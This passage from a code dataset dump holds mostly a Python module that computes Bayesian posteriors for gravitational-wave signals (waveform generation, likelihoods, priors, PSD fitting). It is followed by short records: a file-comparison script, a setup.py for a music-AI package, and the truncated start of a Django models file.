in self.psd:\n p[self.fs < fmin] = float('inf')\n\n if time_data is None and freq_data is None:\n self._data = [np.zeros(data_length, dtype=np.complex) for d in detectors]\n\n # Maybe set seed?\n if dataseed is not None:\n old_state = np.random.get_state()\n np.random.seed(dataseed)\n \n if data_psdparams is not None:\n params = np.zeros(1, dtype=self.dtype)\n params['psdfit'] = data_psdparams\n psd = self.adjusted_psd(params)\n else:\n psd = self.psd\n\n for j in range(len(detectors)):\n # 0.5 = 2 * 1/sqrt(2). One sqrt(2) from\n # one-sided-->two-sided, and the other from <|z|> =\n # sqrt(2) if x,y ~ N(0,1).\n self.data[j] = 0.5*np.sqrt(psd[j]/(self.fs[1]-self.fs[0]))*(np.random.normal(size=data_length) +\n np.random.normal(size=data_length)*1j)\n self.data[j][psd[j]==float('inf')] = 0.0\n\n # Reset random state\n if dataseed is not None:\n np.random.set_state(old_state)\n elif time_data is None:\n self._data = freq_data\n else:\n self._data = []\n for i in range(len(detectors)):\n N = time_data[i].shape[0]\n\n this_srate = float(N)/self.T\n dt = 1.0/this_srate\n\n window = u.tukey_window(N)\n\n fdata = np.fft.rfft(time_data[i]*window)*dt\n\n # Now cut down to the actual sample rate\n self._data.append(fdata[:data_length])\n\n self._c2r_input_fft_array = np.zeros(self.data[0].shape[0], dtype=np.complex128)\n self._c2r_output_fft_array = np.zeros((self.data[0].shape[0]-1)*2, dtype=np.float64)\n self._c2r_fft_plan = fftw3.Plan(inarray=self.c2r_input_fft_array, outarray=self.c2r_output_fft_array, \n direction='forward', flags=['measure']) \n\n self._r2c_input_fft_array = np.zeros((self.data[0].shape[0]-1)*2, dtype=np.float64)\n self._r2c_output_fft_array = np.zeros(self.data[0].shape[0], dtype=np.complex128)\n self._r2c_fft_plan = fftw3.Plan(inarray=self.r2c_input_fft_array, outarray=self.r2c_output_fft_array, direction='forward', flags=['measure'])\n\n if inj_xml is not None:\n params = self.inj_xml_to_params(inj_xml)\n hs = self.generate_waveform(params)\n for i, h in enumerate(hs):\n self.data[i] += h\n elif inj_params is not None:\n hs = self.generate_waveform(inj_params)\n for i,h in enumerate(hs):\n self.data[i] += h\n \n # Handle unpickling the internal state\n def __setstate__(self, state):\n for k,v in state.items():\n self.__dict__[k] = v\n\n # Just the FFTW3 Plans are screwed up:\n self._r2c_fft_plan = fftw3.Plan(inarray=self.r2c_input_fft_array, outarray=self.r2c_output_fft_array, direction='forward', flags=['measure'])\n self._c2r_fft_plan = fftw3.Plan(inarray=self.c2r_input_fft_array, outarray=self.c2r_output_fft_array, direction='forward', flags=['measure']) \n\n @property\n def data(self):\n \"\"\"The frequency-domain data on which the analysis will be conducted.\"\"\"\n return self._data\n\n @property\n def T(self):\n \"\"\"The length (in seconds) of the input data segment.\"\"\"\n return self._T\n\n @property\n def fs(self):\n \"\"\"The frequencies (in Hz) that correspond to the frequency domain data.\"\"\"\n return self._fs\n\n @property\n def df(self):\n \"\"\"The spacing in frequency space.\n\n \"\"\"\n return self.fs[1]-self.fs[0]\n\n @property\n def srate(self):\n \"\"\"The sample rate of the time-domain data.\"\"\"\n return self._srate\n \n @property\n def time_offset(self):\n \"\"\"The GPS time of the start of the data segment.\"\"\"\n return self._time_offset\n\n @property \n def approx(self):\n \"\"\"The waveform approximant.\"\"\"\n return self._approx\n\n @property\n def amp_order(self):\n \"\"\"Amplitude order (``-1`` for max order).\"\"\"\n return self._amp_order\n\n @property\n def phase_order(self):\n \"\"\"The phase order (``-1`` for max order).\"\"\"\n return self._phase_order\n\n @property\n def fmin(self):\n \"\"\"The minimum frequency of the analysis.\"\"\"\n return self._fmin\n\n @property\n def fref(self):\n \"\"\"The reference frequency at which freq-dependent waveform quantities\n are defined.\"\"\"\n\n return self._fref\n\n @property\n def psd(self):\n \"\"\"The array of (one-sided) noise PSDs used in the analysis (one per\n detector).\"\"\"\n return self._psd\n\n @property\n def npsdfit(self):\n \"\"\"The number of PSD fitting parameters to use.\n\n \"\"\"\n\n return self._npsdfit\n\n @property\n def psdfitfs(self):\n \"\"\"The frequencies at which the PSD fit spline knots live.\n\n \"\"\"\n\n return self._psdfitfs\n\n @property\n def msnr(self):\n \"\"\"The SNR below which the prior goes to zero (or ``None`` for no threshold).\"\"\"\n return self._msnr\n\n @property\n def mmin(self):\n \"\"\"The minimum component mass.\"\"\"\n return self._mmin\n\n @property\n def mmax(self):\n \"\"\"The maximum component mass.\"\"\"\n return self._mmax\n\n @property\n def dmax(self):\n \"\"\"The maximum distance.\"\"\"\n return self._dmax\n\n @property\n def detectors(self):\n return self._detectors\n\n @property\n def ndetectors(self):\n return len(self.detectors)\n\n @property \n def c2r_input_fft_array(self):\n return self._c2r_input_fft_array\n\n @property\n def c2r_output_fft_array(self):\n return self._c2r_output_fft_array\n\n @property\n def c2r_fft_plan(self):\n return self._c2r_fft_plan\n\n @property\n def r2c_input_fft_array(self):\n return self._r2c_input_fft_array\n\n @property\n def r2c_output_fft_array(self):\n return self._r2c_output_fft_array\n\n @property\n def r2c_fft_plan(self):\n return self._r2c_fft_plan\n\n @property\n def nparams(self):\n \"\"\"The dimensionality of the parameter space.\"\"\"\n return 15 + self.ndetectors*self.npsdfit\n\n @property\n def header(self):\n \"\"\"A useful header describing the parameters for this posterior in text files.\n\n \"\"\"\n\n header = ['log_mc', 'eta', 'cos_iota', 'phi', 'psi', 'time', 'ra',\n 'sin_dec', 'log_dist', 'a1', 'cos_tilt1', 'phi1', 'a2', 'cos_tilt2', \n 'phi2']\n\n for d in self.detectors:\n for i in range(self.npsdfit):\n header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n return ' '.join(header)\n\n def to_params(self, p):\n return p.view([('log_mc', np.float),\n ('eta', np.float),\n ('cos_iota', np.float),\n ('phi', np.float),\n ('psi', np.float),\n ('time', np.float),\n ('ra', np.float),\n ('sin_dec', np.float),\n ('log_dist', np.float), \n ('a1', np.float),\n ('cos_tilt1', np.float),\n ('phi1', np.float),\n ('a2', np.float),\n ('cos_tilt2', np.float),\n ('phi2', np.float)] + [('psdfit', np.float, (self.ndetectors, self.npsdfit))])\n\n def adjusted_psd(self, params):\n \"\"\"Returns a PSD for each detector, adjusted by the PSD parameters for\n that detector.\n\n \"\"\"\n\n if self.npsdfit == 0:\n return self.psd\n\n params = self.to_params(params)\n sel = self.fs >= self.fmin\n\n fs = self.fs[sel]\n\n psds = []\n\n for raw_psd, psdp in zip(self.psd, params['psdfit'].squeeze()):\n log_factors = si.InterpolatedUnivariateSpline(np.log(self.psdfitfs), psdp)(np.log(fs))\n\n psd = raw_psd.copy()\n psd[sel] *= np.exp(log_factors)\n\n psds.append(psd)\n\n return psds\n\n def inj_xml_to_params(self, inj_xml, event=0, psdfit=None):\n \"\"\"Returns the parameters that correspond to the given XML file,\n optionally with the given PSD fitting parameters.\n\n :param inj_xml: Filename of the injection XML.\n\n :param event: The event number to use from the XML.\n\n :param psdfit: The PSD fitting parameters to add to the\n returned parameters.\n\n \"\"\"\n\n p = self.to_params(np.zeros(self.nparams))\n\n table = SimInspiralUtils.ReadSimInspiralFromFiles([inj_xml])[event]\n\n p['log_mc'] = np.log(table.mchirp)\n p['eta'] = table.eta\n p['log_dist'] = np.log(table.distance)\n p['ra'] = table.longitude\n p['sin_dec'] = np.sin(table.latitude)\n p['cos_iota'] = np.cos(table.inclination)\n p['phi'] = table.coa_phase\n p['psi'] = table.polarization\n \n time_offset = self.time_offset.LIGOTimeGPS\n p['time'] = table.geocent_end_time - time_offset.gpsSeconds + 1e-9*(table.geocent_end_time_ns - time_offset.gpsNanoSeconds)\n\n s1 = np.array([table.spin1x, table.spin1y, table.spin1z])\n s2 = np.array([table.spin2x, table.spin2y, table.spin2z])\n\n Lhat = np.array([np.sin(table.inclination), 0.0, np.cos(table.inclination)])\n xhat = np.array([np.cos(table.inclination), 0.0, -np.sin(table.inclination)])\n yhat = np.array([0.0,1.0,0.0])\n\n if np.linalg.norm(s1) == 0.0:\n p['a1'] = 0.0\n p['cos_tilt1'] = 1.0\n p['phi1'] = 0.0\n else:\n a1 = np.linalg.norm(s1)\n p['a1'] = a1\n p['cos_tilt1'] = np.dot(s1, Lhat)/a1\n p['phi1'] = np.arctan2(np.dot(s1, yhat), np.dot(s1, xhat))\n if p['phi1'] < 0.0:\n p['phi1'] += 2.0*np.pi\n\n if np.linalg.norm(s2) == 0.0:\n p['a2'] = 0.0\n p['cos_tilt2'] = 1.0\n p['phi2'] = 0.0\n else:\n a2 = np.linalg.norm(s2)\n p['a2'] = a2\n p['cos_tilt2'] = np.dot(s2, Lhat)/a2\n p['phi2'] = np.arctan2(np.dot(s2, yhat), np.dot(s2, xhat))\n if p['phi2'] < 0.0:\n p['phi2'] += 2.0*np.pi\n\n if psdfit is not None:\n p['psdfit'] = psdfit\n\n return p\n\n\n def generate_waveform(self, params):\n \"\"\"Returns a frequency-domain strain suitable to subtract from the\n frequency-domain data (i.e. the samples line up in frequency\n space).\n \"\"\"\n\n params = self.to_params(params).squeeze()\n\n # Can only handle one parameter set at a time, so extract\n # first from array if more than one.\n if isinstance(params, np.ndarray) and params.ndim > 0:\n params = params[0]\n elif isinstance(params, np.ndarray):\n params = params[()]\n \n m1,m2 = u.mc_eta_to_masses(np.exp(params['log_mc']), params['eta'])\n d = 1e6*lal.PC_SI*np.exp(params['log_dist'])\n i = np.arccos(params['cos_iota'])\n\n dec = np.arcsin(params['sin_dec'])\n\n inc = np.arccos(params['cos_iota'])\n\n a1 = params['a1']\n tilt1 = np.arccos(params['cos_tilt1'])\n phi1 = params['phi1']\n a2 = params['a2']\n tilt2 = np.arccos(params['cos_tilt2'])\n phi2 = params['phi2']\n\n zhat = np.array([np.sin(inc), 0.0, np.cos(inc)])\n xhat = np.array([np.cos(inc), 0.0, -np.sin(inc)])\n yhat = np.array([0.0, 1.0, 0.0])\n\n s1 = a1 * (np.cos(phi1)*np.sin(tilt1)*xhat +\\\n np.sin(phi1)*np.sin(tilt1)*yhat +\\\n np.cos(tilt1)*zhat)\n s2 = a2 * (np.cos(phi2)*np.sin(tilt2)*xhat +\\\n np.sin(phi2)*np.sin(tilt2)*yhat +\\\n np.cos(tilt2)*zhat)\n\n if ls.SimInspiralImplementedFDApproximants(self.approx) == 1:\n hplus,hcross = ls.SimInspiralChooseFDWaveform(params['phi'], \n self.fs[1]-self.fs[0],\n m1*lal.MSUN_SI, m2*lal.MSUN_SI, \n s1[0], s1[1], s1[2],\n s2[0], s2[1], s2[2],\n self.fmin, self.fs[-1], 100.0,\n d, i, \n 0.0, 0.0,\n None, None, \n self.amp_order, self.phase_order, \n self.approx)\n\n hpdata = hplus.data.data\n hcdata = hcross.data.data\n\n # If necessary, cut down to size\n if hpdata.shape[0] > self.fs.shape[0]:\n hpdata = hpdata[:self.fs.shape[0]]\n hcdata = hcdata[:self.fs.shape[0]]\n else:\n hplus,hcross = ls.SimInspiralChooseTDWaveform(params['phi'],\n 1.0/self.srate,\n m1*lal.MSUN_SI, m2*lal.MSUN_SI, \n s1[0], s1[1], s1[2],\n s2[0], s2[1], s2[2],\n self.fmin, self.fref,\n d, i, \n 0.0, 0.0,\n None, None, \n self.amp_order, self.phase_order, \n self.approx)\n \n Ntime = (self.data[0].shape[0]-1)*2\n \n # Cut down to length if necessary\n hpdata = hplus.data.data\n hcdata = hcross.data.data\n tC_index = int(round(-(hplus.epoch.gpsSeconds + 1e-9*hplus.epoch.gpsNanoSeconds)*self.srate))\n if hpdata.shape[0] > Ntime:\n tC_index -= hpdata.shape[0] - Ntime\n hpdata = hpdata[-Ntime:]\n hcdata = hcdata[-Ntime:]\n\n # Now Fourier transiform; place the waveform's tC index\n # into the zero index of the FT array\n Nbegin = hpdata.shape[0] - tC_index\n\n self.r2c_input_fft_array[:] = 0.0\n self.r2c_input_fft_array[:Nbegin] = hpdata[tC_index:]\n self.r2c_input_fft_array[-tC_index:] = hpdata[:tC_index]\n self.r2c_fft_plan()\n hpdata = self.r2c_output_fft_array / self.srate # multiply by dt\n \n self.r2c_input_fft_array[:] = 0.0\n self.r2c_input_fft_array[:Nbegin] = hcdata[tC_index:]\n self.r2c_input_fft_array[-tC_index:] = hcdata[:tC_index]\n self.r2c_fft_plan()\n hcdata = self.r2c_output_fft_array / self.srate # multiply by dt\n\n hout=[]\n for d in self.detectors:\n sec = self.time_offset.sec + int(params['time'])\n ns = self.time_offset.ns + int(round(1e9*(params['time']-int(params['time']))))\n\n while ns > 1e9:\n sec += 1\n ns -= 1e9\n \n tgps = lal.LIGOTimeGPS(sec, nanoseconds=ns)\n\n gmst = lal.GreenwichMeanSiderealTime(tgps)\n\n if d == 'H1':\n diff = lal.LALDetectorIndexLHODIFF\n elif d == 'L1':\n diff = lal.LALDetectorIndexLLODIFF\n elif d == 'V1':\n diff = lal.LALDetectorIndexVIRGODIFF\n else:\n raise ValueError('detector not recognized: ' + d)\n \n location = lal.CachedDetectors[diff].location\n\n timedelay = lal.TimeDelayFromEarthCenter(location, params['ra'], dec, tgps)\n\n timeshift = params['time'] + timedelay\n \n fplus, fcross = lal.ComputeDetAMResponse(lal.CachedDetectors[diff].response,\n params['ra'], dec, params['psi'], gmst)\n\n h = combine_and_timeshift(fplus, fcross, hpdata, hcdata, self.fs, timeshift)\n\n hout.append(h)\n\n return hout\n\n def malmquist_snr(self, params):\n \"\"\"Returns the SNR that will be used in the Malmquist threshold in the\n likelihood function.\n\n The malmquist SNR is either:\n\n * The SNR in the second-loudest detector if there are two or\n more detectors.\n\n * The SNR if there is only one detector.\n\n The intention is to approximate a coincidence threshold from a\n pipeline.\n\n \"\"\"\n\n hs = self.generate_waveform(params)\n df = self.fs[1] - self.fs[0]\n\n adj_psd = self.adjusted_psd(params)\n rhos = [np.sqrt(4.0*df*np.real(np.sum(np.conj(h)*h/psd))) for h, psd in zip(hs, adj_psd)]\n \n if len(rhos) > 1:\n rhos.sort()\n return rhos[-2]\n else:\n return rhos[0]\n\n def log_likelihood(self, params):\n r\"\"\"Returns the log likelihood of the given parameters. The\nlog-likelihood is\n\n .. math::\n \n \\log \\mathcal{L} = -\\frac{1}{2} \\left( \\left\\langle d | d \\right\\rangle -2 \\Re \\left\\langle d | h \\right\\rangle + \\left\\langle h | h \\right\\rangle \\right) - \\frac{1}{2} \\sum \\log S(f)\n\n where \n\n .. math::\n\n \\left\\langle a | b \\right\\rangle = 4 \\int df \\, \\frac{a^*(f) b(f)}{S(f)},\n\n where :math:`S(f)` is the one-sided noise power spectral density.\n\n This corresponds to the ususal log-likelihood in Gaussian\n noise, accounting for the fact that parameters can cause the\n PSD to vary.\n\n If the :attr:`Posterior.malmquest_snr` is not ``None``, then\n the likelihood will be returned as ``float('-inf')`` when\n :math:`\\left\\langle h | h \\right\\rangle^{1/2}` is smaller than\n :attr:`Posterior.malmquest_snr`\"\"\"\n\n hs = self.generate_waveform(params)\n df = self.fs[1] - self.fs[0]\n\n istart = np.nonzero(self.fs >= self.fmin)[0][0]\n\n hh_list=[]\n logl = 0.0\n adj_psd = self.adjusted_psd(params)\n for h, d, psd in zip(hs, self.data, adj_psd):\n hh,dh,dd = data_waveform_inner_product(istart, df, psd, h, d)\n\n hh_list.append(hh)\n\n logl += -0.5*(hh - 2.0*dh + dd)\n logl -= np.sum(np.log(2.0*np.pi*psd[istart:]/(4.0*(self.fs[1]-self.fs[0]))))\n\n # If malmquist priors, then cutoff when the SNR is too quiet.\n hh_list.sort()\n if self.msnr is not None:\n if len(hh_list) > 1 and hh_list[1] < self.msnr*self.msnr:\n return float('-inf')\n elif len(hh_list) == 1 and hh_list[0] < self.msnr*self.msnr:\n return float('-inf')\n\n return logl\n\n def log_prior(self, params):\n \"\"\"Returns the log of the prior. More details to follow. \n \"\"\"\n params = self.to_params(params)\n\n if isinstance(params, np.ndarray):\n params = params[0]\n\n if params['eta'] < 0 or params['eta'] > 0.25:\n return float('-inf')\n\n # First basic ranges on parameters:\n mc = np.exp(params['log_mc'])\n d = np.exp(params['log_dist'])\n m1,m2=u.mc_eta_to_masses(mc, params['eta'])\n mtot = m1+m2\n\n if m1 > self.mmax or m2 < self.mmin:\n return float('-inf')\n\n if params['cos_iota'] < -1.0 or params['cos_iota'] > 1.0:\n return float('-inf')\n\n if params['phi'] > 2.0*np.pi or params['phi'] < 0.0:\n return float('-inf')\n\n if params['psi'] > 2.0*np.pi or params['psi'] < 0.0:\n return float('-inf')\n\n if params['time'] < 0 or params['time'] > self.T:\n return float('-inf')\n\n if params['ra'] < 0.0 or params['ra'] > 2.0*np.pi:\n return float('-inf')\n\n if params['sin_dec'] < -1.0 or params['sin_dec'] > 1.0:\n return float('-inf')\n\n if d > self.dmax:\n return float('-inf')\n\n if params['a1'] <= 0.0 or params['a1'] >= 1.0:\n return float('-inf')\n\n if params['a2'] <= 0.0 or params['a2'] >= 1.0:\n return float('-inf')\n\n if params['cos_tilt1'] < -1.0 or params['cos_tilt1'] > 1.0:\n return float('-inf')\n\n if params['cos_tilt2'] < -1.0 or params['cos_tilt2'] > 1.0:\n return float('-inf')\n\n if params['phi1'] < 0.0 or params['phi1'] >= 2.0*np.pi:\n return float('-inf')\n\n if params['phi2'] < 0.0 or params['phi2'] >= 2.0*np.pi:\n return float('-inf')\n\n logp = 0.0\n\n # A flat prior in mass space gives the following in log(mc)-eta space:\n logp -= np.log(m1-m2) - 3.0*np.log(mtot)\n \n # Prior volumetric in distance:\n logp += 3.0*params['log_dist']\n\n # N(0,1) prior on PSD parameters (which are log(factor) at\n # each frequency).\n logp += np.sum(u.norm_logpdf(params['psdfit']))\n\n if isinstance(logp, np.ndarray):\n if logp.ndim > 0:\n logp = logp[0]\n else:\n logp = logp[()]\n\n return logp\n\n def draw_prior(self, shape=(1,)):\n params = self.to_params(np.zeros(shape+(self.nparams,))).squeeze()\n\n m1s = np.random.uniform(low=self.mmin, high=self.mmax, size=shape)\n m2s = np.random.uniform(low=self.mmin, high=self.mmax, size=shape)\n\n mc, eta = u.masses_to_mc_eta(m1s, m2s)\n\n params['log_mc'] = np.log(mc)\n params['eta'] = eta\n\n params['cos_iota'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['phi'] = np.random.uniform(low=0.0, high=np.pi, size=shape)\n params['psi'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['time'] = np.random.uniform(low=0.0, high=self.T, size=shape)\n params['ra'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['sin_dec'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['log_dist'] = np.log(self.dmax) + (1.0/3.0)*np.log(np.random.uniform(size=shape))\n params['a1'] = np.random.uniform(low=0.0, high=1.0, size=shape)\n params['a2'] = np.random.uniform(low=0.0, high=1.0, size=shape)\n params['cos_tilt1'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['cos_tilt2'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['phi1'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['phi2'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n\n params['psdfit'] = np.random.normal(size=shape + (len(self.detectors), self.npsdfit))\n\n return params\n\n def argmax_log_likelihood_tphid(self, params):\n params = self.to_params(params)\n\n df = self.fs[1] - self.fs[0]\n hs = self.generate_waveform(params)\n\n \n dh_dt_cos = 0.0\n dh_dt_sin = 0.0\n hh = 0.0\n adj_psd = self.adjusted_psd(params)\n\n for d, h, psd in zip(self.data, hs, adj_psd):\n conj_d = np.conj(d)\n dh_real = 2.0*df*conj_d*np.real(h)/psd\n dh_imag = 2.0*df*conj_d*np.imag(h)/psd\n\n self.c2r_input_fft_array[:] = dh_real\n self.c2r_fft_plan()\n dh_dt_cos += self.c2r_output_fft_array\n\n self.c2r_input_fft_array[:] = dh_imag\n self.c2r_fft_plan()\n dh_dt_sin += self.c2r_output_fft_array\n\n hh += np.sum(4.0*df*np.abs(h)*np.abs(h)/psd)\n\n\n dh_dt = np.sqrt(dh_dt_cos*dh_dt_cos + dh_dt_sin*dh_dt_sin)\n idt = np.argmax(dh_dt)\n\n if idt == 0:\n a = np.abs(dh_dt[0])\n b = np.abs(dh_dt[1])\n c = np.abs(dh_dt[2])\n i0 = 0\n elif idt == len(dh_dt) - 1:\n a = np.abs(dh_dt[-3])\n b = np.abs(dh_dt[-2])\n c = np.abs(dh_dt[-1])\n i0 = len(dh_dt) - 3\n else:\n a = np.abs(dh_dt[idt-1])\n b = np.abs(dh_dt[idt])\n c = np.abs(dh_dt[idt+1])\n i0 = idt-1\n\n imax = i0 + 0.5 + (a-b)/(a+c-2.0*b)\n\n dt_max = imax/float(self.srate)\n dphi_max = -0.5*np.arctan2(dh_dt_sin[idt], dh_dt_cos[idt])\n\n dh_max = np.abs(dh_dt[idt])\n dfactor = hh / dh_max\n logd_max = params['log_dist'] + np.log(dfactor)\n\n max_params = params.copy()\n\n max_params['log_dist'] = logd_max\n\n max_params['phi'] = np.mod(params['phi'] + dphi_max, np.pi)\n if max_params['phi'] < 0:\n max_params['phi'] += np.pi\n\n max_params['time'] = np.mod(params['time'] + dt_max, self.T)\n\n return max_params\n\n def __call__(self, params):\n lp = self.log_prior(params)\n\n if lp == float('-inf'):\n return lp\n\n return lp + self.log_likelihood(params)\n\nclass TimeMarginalizedPosterior(Posterior):\n \"\"\"Posterior that marginalizes out the time variable on each\n likelihood call.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"See :method:`Posterior.__init__`.\"\"\"\n super(TimeMarginalizedPosterior, self).__init__(*args, **kwargs)\n\n def to_params(self, params):\n try:\n return params.view([('log_mc', np.float),\n ('eta', np.float),\n ('cos_iota', np.float),\n ('phi', np.float),\n ('psi', np.float),\n ('ra', np.float),\n ('sin_dec', np.float),\n ('log_dist', np.float), \n ('a1', np.float),\n ('cos_tilt1', np.float),\n ('phi1', np.float),\n ('a2', np.float),\n ('cos_tilt2', np.float),\n ('phi2', np.float)] + \\\n [('psdfit', np.float, (self.ndetectors, self.npsdfit))])\n except:\n return super(TimeMarginalizedPosterior, self).to_params(params)\n\n @property\n def header(self):\n \"\"\"A useful header describing the parameters for this posterior in text files.\n\n \"\"\"\n\n header = ['log_mc', 'eta', 'cos_iota', 'phi', 'psi', 'ra', 'sin_dec', \n 'log_dist', 'a1', 'cos_tilt1', 'phi1', 'a2', 'cos_tilt2', \n 'phi2']\n\n for d in self.detectors:\n for i in range(self.npsdfit):\n header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n return ' '.join(header)\n\n @property\n def tm_nparams(self):\n return 14 + self.ndetectors*self.npsdfit\n\n def to_super_params(self, params, time=0):\n params = self.to_params(params)\n sps = super(TimeMarginalizedPosterior, self).to_params(np.zeros(params.shape + (self.nparams,)))\n\n for name in params.dtype.names:\n sps[name] = params[name]\n\n sps['time'] = time\n\n return sps\n\n def from_super_params(self, params):\n params = self.to_params(params)\n sps = self.to_params(np.zeros(params.shape+(self.tm_nparams,))).squeeze()\n\n for name in sps.dtype.names:\n sps[name] = params[name]\n\n return sps\n\n def adjusted_psd(self, params):\n pfull = self.to_super_params(params)\n return super(TimeMarginalizedPosterior, self).adjusted_psd(pfull)\n\n def malmquist_snr(self, params):\n \"\"\"See :method:`Posterior.malmquist_snr`.\"\"\"\n p = self.to_super_params(params, time=0)\n\n return super(TimeMarginalizedPosterior, self).malmquist_snr(p)\n\n def time_integrate(self, log_ls):\n \"\"\"Returns the log of the integral of the given log(L) values as a\n function of time, using an analytic, quadratic interpolation\n of the log(L) values.\n\n \"\"\"\n \n full_log_ls = np.zeros(log_ls.shape[0]+1)\n full_log_ls[:-1] = log_ls\n full_log_ls[-1] = log_ls[0]\n\n dt = 1.0/self.srate\n\n # dt*sum(log_ls) = dt*(1/2*fll[0] + fll[1] + ... + fll[N-1] + 1/2*fll[N])\n # This is the trapezoid rule for the integral.\n log_best_integral = logaddexp_sum(log_ls) + np.log(dt)\n\n return log_best_integral\n\n def log_likelihood(self, params):\n \"\"\"Returns the marginalized log-likelihood at the given params (which\n should have all parameters but time).\"\"\"\n \n params = self.to_params(params)\n params_full = self.to_super_params(params, time=0)\n\n hs = self.generate_waveform(params_full)\n\n ll = 0.0\n df = self.fs[1] - self.fs[0]\n\n hh_list = []\n dh_timeshifts = 0.0\n adj_psd = self.adjusted_psd(params)\n for h, d, psd in zip(hs, self.data, adj_psd):\n hh,dd = hh_dd_sum(df, psd, h, d)\n\n hh_list.append(hh)\n\n fill_fft_array(df, psd, d, h, self.c2r_input_fft_array)\n self.c2r_fft_plan()\n dh_timeshifts += self.c2r_output_fft_array\n \n ll += -0.5*(hh + dd)\n ll -= np.sum(np.log(2.0*np.pi*psd[psd != float('inf')]/(4.0*(self.fs[1]-self.fs[0]))))\n\n dh = self.time_integrate(dh_timeshifts)\n ll += dh\n\n # Normalization for time integral\n ll -= np.log(self.T)\n\n if self.msnr is not None:\n if len(hh_list) == 1:\n hh2nd = hh_list[0]\n else:\n hh_list.sort()\n hh2nd = hh_list[-2]\n\n if hh2nd < self.msnr*self.msnr:\n return float('-inf')\n\n return ll\n\n def log_prior(self, params):\n \"\"\"Log prior; same as :method:`Posterior.log_prior`, but without\n `time` column.\n\n \"\"\"\n \n params = self.to_params(params)\n params_full = self.to_super_params(params, time = 0.5*self.T)\n\n return super(TimeMarginalizedPosterior, self).log_prior(params_full)\n\n def draw_prior(self, shape=(1,)):\n pfull = super(TimeMarginalizedPosterior, self).draw_prior(shape=shape)\n return self.from_super_params(pfull)\n\n def argmax_log_likelihood_phid(self, params):\n params_full = self.to_super_params(params, time = 0.5*self.T)\n \n p = self.from_super_params(super(TimeMarginalizedPosterior, self).argmax_log_likelihood_tphid(params_full))\n\n return p\n\nclass NoiseOnlyPosterior(Posterior):\n \"\"\"Represents the posterior for a noise-only model.\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(NoiseOnlyPosterior, self).__init__(*args, **kwargs)\n\n @property\n def header(self):\n header = []\n for d in self.detectors:\n for i in range(self.npsdfit):\n header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n return ' '.join(header)\n\n\n @property\n def no_nparams(self):\n return self.ndetectors*self.npsdfit\n\n def to_params(self, params):\n try:\n return params.view([('psdfit', np.float, (self.ndetectors, self.npsdfit))])\n except:\n return super(NoiseOnlyPosterior, self).to_params(params)\n\n def generate_waveform(self, params):\n if params.view(float).shape[0] == self.no_nparams:\n hs = []\n for d in self.data:\n hs.append(0.0*d)\n return hs\n else:\n return super(NoiseOnlyPosterior, self).generate_waveform(params)\n\n def log_prior(self, params):\n return np.sum(u.norm_logpdf(params))\n\n def draw_prior(self, shape=(1,)):\n return self.to_params(np.random.normal(size=shape+(self.ndetectors*self.npsdfit,)))\n\n \n","repo_name":"farr/nu-ligo-utils","sub_path":"ensemble-sampler/posterior.py","file_name":"posterior.py","file_ext":"py","file_size_in_byte":37170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70724901870","text":"#!/usr/bin/env python\n\nc1 = open(\"Comp1.txt\", \"r\")\nc2 = open(\"Comp2.txt\", \"r\")\narchivoUno = c1.readlines()\narchivoDos = c2.readlines()\nc1.close()\nc2.close()\nresult = open(\"resultado.txt\", \"w\")\n\nx = 0\nfor i in archivoUno:\n if i != archivoDos[x]:\n result.write(i+\"El otro archivo contiene >> \"+archivoDos[x])\n x += 1\n\n\t\nresult.close()","repo_name":"jetsky0/projectvoteredes","sub_path":"huellas_ordinario.py","file_name":"huellas_ordinario.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23708278234","text":"from setuptools import setup, find_packages\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE.md') as f:\n license = f.read()\n\nrequirements = [\n 'numpy',\n 'matplotlib',\n 'pretty_midi',\n 'pyFluidSynth >= 1.2.5',\n 'librosa',\n 'essentia',\n 'keras',\n 'tensorflow',\n]\n\nsetup(\n name='mai',\n version='0.0.1',\n description='Music and Artificial Intelligence',\n long_description=readme,\n author='David Kant',\n author_email='dkant@ucsc.edu',\n url='https://canvas.ucsc.edu/courses/12767',\n license=license,\n packages=find_packages(exclude=('tests', 'docs')),\n install_requires=requirements\n)\n","repo_name":"davidkant/mai","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"38"} +{"seq_id":"71450660271","text":"from uuid import uuid4\n\nimport pdfkit\nfrom django.conf import settings\nfrom django.contrib.staticfiles import finders\nfrom django.core.validators import (\n MaxValueValidator,\n MinValueValidator,\n FileExtensionValidator,\n)\nfrom django.db import models\nfrom django.template.loader import render_to_string\n\nfrom accounts.models import UserAccount, Student, Session\n\nSTATE_CHOICES = (\n (\"Andhra Pradesh\", \"Andhra Pradesh\"),\n (\"Arunachal Pradesh\", \"Arunachal Pradesh\"),\n (\"Assam\", \"Assam\"),\n (\"Bihar\", \"Bihar\"),\n (\"Chhattisgarh\", \"Chhattisgarh\"),\n (\"Goa\", \"Goa\"),\n (\"Gujarat\", \"Gujarat\"),\n (\"Haryana\", \"Haryana\"),\n (\"Himachal Pradesh\", \"Himachal Pradesh\"),\n (\"Jharkhand\", \"Jharkhand\"),\n (\"Karnataka\", \"Karnataka\"),\n (\"Kerala\", \"Kerala\"),\n (\"Madhya Pradesh\", \"Madhya Pradesh\"),\n (\"Maharashtra\", \"Maharashtra\"),\n (\"Manipur\", \"Manipur\"),\n (\"Meghalaya\", \"Meghalaya\"),\n (\"Mizoram\", \"Mizoram\"),\n (\"Nagaland\", \"Nagaland\"),\n (\"Odisha\", \"Odisha\"),\n (\"Punjab\", \"Punjab\"),\n 